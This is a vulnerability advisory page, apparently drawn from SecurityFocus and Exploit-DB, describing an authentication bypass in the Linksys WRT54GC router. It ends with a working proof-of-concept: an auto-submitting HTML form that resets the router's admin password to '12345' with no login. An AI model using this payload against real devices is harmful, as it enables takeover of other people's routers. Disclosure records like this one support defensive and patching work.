Linksys WRT54GC Router Access Validation Vulnerability

vendor:

WRT54GC

by:

SecurityFocus

7.8

CVSS

HIGH

Access Validation Vulnerability

287

CWE

Product Name: WRT54GC

Affected Version From: 01.05.2007

Affected Version To: 01.05.2007

Patch Exists: YES

Related CWE: N/A

CPE: h:linksys:wrt54gc

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Linksys WRT54GC Router Access Validation Vulnerability

The Linksys WRT54GC router is prone to an access-validation vulnerability because of a lack of authentication when users access specific administration applications. Successful attacks will lead to a compromise of the vulnerable device, which may lead to further attacks. An attacker can exploit this issue by sending a specially crafted HTML form to the vulnerable device.

Mitigation:

Users should ensure that authentication is enabled for all administration applications.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/34616/info

The Linksys WRT54GC router is prone to an access-validation vulnerability because of a lack of authentication when users access specific administration applications.

Successful attacks will lead to a compromise of the vulnerable device, which may lead to further attacks.

Linksys WRT54GC running firmware 1.05.7 is vulnerable; other versions may also be affected.

<html><body> <form method="POST" action="http://IP_ADDRESS:8080/administration.cgi" name="senha" ENCTYPE="multipart/form-data"> <INPUT type="hidden" name="sysPasswd" value="12345" maxLength=20 size=21> <INPUT type="hidden" name="sysConfirmPasswd" value="12345" maxLength=20 size=21> </form> <!-- C?digo de envio autom?tico do formul?rio --> <SCRIPT language="JavaScript"> document.senha.submit(); </SCRIPT>